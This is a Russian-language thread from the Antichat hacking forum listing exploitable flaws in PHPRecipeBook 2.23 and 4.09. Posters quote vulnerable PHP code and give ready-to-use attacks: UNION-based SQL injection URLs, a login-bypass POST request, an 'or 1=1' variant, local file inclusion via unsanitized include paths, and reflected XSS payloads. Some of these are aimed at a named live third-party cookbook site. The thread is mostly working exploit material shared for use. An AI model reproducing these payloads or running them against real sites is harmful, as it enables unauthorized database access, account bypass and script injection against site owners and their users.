ANTICHAT - PHPRecipeBook 2.23

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - PHPRecipeBook 2.23 (https://forum.antichat.xyz/showthread.php?t=155343)

PHPRecipeBook 2.23

Уязвимость : SQL

Файл modules\recipes\search.php

PHP код:


		
			
if ($_REQUEST) $query .= " recipe_course=" . $_REQUEST . " AND";          if ($_REQUEST) $query .= " recipe_base=" . $_REQUEST . " AND";          if ($_REQUEST) $query .= " recipe_ethnic=" . $_REQUEST . " AND";          if ($_REQUEST) $query .= " recipe_prep_time=" . $_REQUEST . " AND";          if ($_REQUEST) $query .= " recipe_difficulty=" . $_REQUEST . " AND";

Запрос там выше, искать времени нету

__http://www.bergiescookbook.com/cookbook/index.php?m=recipes&a=search&search=yes&base_id=-10+union+select+1,version(),3,4,5,6,7--

Уязвимость : LFI
Условия :MQ=off

Файл index.php

PHP код:


		
			
$m = isset( $_GET['m'] ) ? $_GET['m'] : 'recipes';

$a = isset( $_GET['a'] ) ? $_GET['a'] : 'index';

include "modules/$m/$a.php";

__http://www.bergiescookbook.com/cookbook/index.php?m=recipes'&a=search'&search=yes&base_id= 10

Ушел спать, время многО, завтра добью

Уязвимоть : Blind -SQL

Файл : modules\recipes\view.php

PHP код:


		
			
$recipe_id = isset( $_GET['recipe_id'] ) ? $_GET['recipe_id'] : 0;

$show_ratings = isset ($_GET['show_ratings'] ) ? true : false;

$show_ratings = isset($_GET['show_ratings']) ? isset($_GET['show_ratings']) : $g_rb_show_ratings;



#Construct the Query and do most of the setup first, the print html

$sql = "SELECT $db_table_recipes.*,

        ethnic_desc,

        base_desc,

        course_desc,

        time_desc,

        difficult_desc,

        user_name

FROM $db_table_recipes

LEFT JOIN $db_table_ethnicity ON ethnic_id = recipe_ethnic

LEFT JOIN $db_table_bases ON base_id = recipe_base

LEFT JOIN $db_table_courses ON course_id = recipe_course

LEFT JOIN $db_table_prep_time ON time_id = recipe_prep_time

LEFT JOIN $db_table_difficulty ON difficult_id = recipe_difficulty

LEFT JOIN $db_table_users ON user_login = recipe_owner

WHERE recipe_id = $recipe_id";

Уязвимость : LFI

PHP код:


		
			
if (!empty( $_REQUEST['dosql'] )) {

    include "modules/$m/".$_REQUEST['dosql'].".php";

__http://www.bergiescookbook.com/cookbook/index.php?dosql='

Уязвимость pXSS

PHP код:


		
			
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass"><?php echo $LangUI->_('Mass');?></a> |

        <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume"><?php echo $LangUI->_('Volume');?></a> |

        <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume2mass"><?php echo $LangUI->_('Volume to mass');?></a> |

        <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass2volume"><?php echo $LangUI->_('Mass to volume');?></a> |

        <a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=temperature"><?php echo $LangUI->_('Temperature');?></a>

Лично из за этого кода я и попер смареть xss я прав??

_http://www.bergiescookbook.com/cookbook/index.php?m=utils&a=converter&type=volume/%3E%3Cscript%3Ealert(/%C1%F3%EA%E8%ED%E0%F2%EE%F0/)%3C/script%3E

PhpRecipeBook 4.09

SQL injection

Уязвимый post - параметр:sm_login_id

Заисимости: mq = off

Вектор: union-query

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$sm_login_id[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_login_id'[/COLOR][COLOR="#007700"]] ) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_login_id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$sm_password[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_password'[/COLOR][COLOR="#007700"]] ) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_password'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

    if ([/COLOR][COLOR="#0000BB"]$sm_login_id[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]// try login if they are passing us a login ID

[/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]$SMObj[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sm_login_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sm_password[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$SMObj[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]addErrorMsg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$SMObj[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Login Failed! Please try again.'[/COLOR][COLOR="#007700"]));

        }

    }[/COLOR][/COLOR]

Функция login:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {

        if ([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_autoLoginUser[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_autoLoginPasswd[/COLOR][COLOR="#007700"];

        }

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db_table_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db_table_users[/COLOR][COLOR="#007700"]. 

[/COLOR][COLOR="#DD0000"]" WHERE user_login = '[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#DD0000"]' AND user_password = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

Exploit:

Цитата:

Сообщение от None

POST /phprecipebook/index.php HTTP/1.1
Host: 127.0.0.1
...
sm_login_id=
'union select concat_ws(0x3a,version(),database(),user()),2,3,4, 5,6,7,8,9,10+--+
&sm_password=antichat

passive XSS(reflected)

Уязвимый параметр:keywords

Заисимости: mq = off

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][/COLOR]">[/COLOR]

Exploit:

[127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords=">alert('Antichat')&search=yes]

YaBtr, lol на кой здесь union, судя по коду прокатит и

admin' or 1=1 --

Цитата:

Сообщение от chekist

YaBtr, lol на кой здесь union, судя по коду прокатит и
admin' or 1=1 --

Конечно, проглядел, вопросов нет!